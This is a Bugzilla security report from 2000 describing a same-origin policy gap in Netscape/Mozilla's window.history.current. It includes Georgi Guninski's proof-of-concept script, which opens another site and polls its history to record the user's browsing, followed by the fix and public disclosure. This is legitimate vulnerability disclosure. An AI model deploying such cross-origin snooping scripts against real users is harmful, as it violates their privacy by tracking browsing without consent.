Status
()
People
(Reporter: Norris Boyd, Assigned: Mitchell Stoltz (not reading bugmail))
Tracking
Firefox Tracking Flags
(Not tracked)
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 attachment)
|
749 bytes,
text/html
|
Details |
Subject:
BUG: window.history.current allows tracking user's browsing
Date:
Tue, 02 May 2000 15:45:02 +0300
From:
Georgi Guninski <joro@nat.bg>
To:
Norris Boyd <norris@netscape.com>
window.history.current is not protected by Same Origin security policy
and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
a=window.open("http://www.yahoo.com");
function checkStatus()
{
current=a.history.current;
if (current != "" && current != last)
{
last = current;
document.forms[0].elements[0].value += current + " ";
}
}
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------
Reading links using window.history.current
window.history.current is not protected by Same Origin security policy and that
allows tracking user's surfing.
Follow some links in www.yahoo.com and see them in the TEXTAREA bellow.
|
(Reporter) | |
Comment 1•18 years ago
|
||
Created attachment 8206 [details]
Test case
|
(Assignee) | |
Comment 2•18 years ago
|
||
Need to double-check call to same-origin, check default policy. I think I can take care of this one.
|
|
(Assignee) | |
Updated•18 years ago
|
||
Target Milestone: --- → M16
|
|
(Assignee) | |
Comment 6•18 years ago
|
||
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED
|
|
(Assignee) | |
Comment 8•18 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•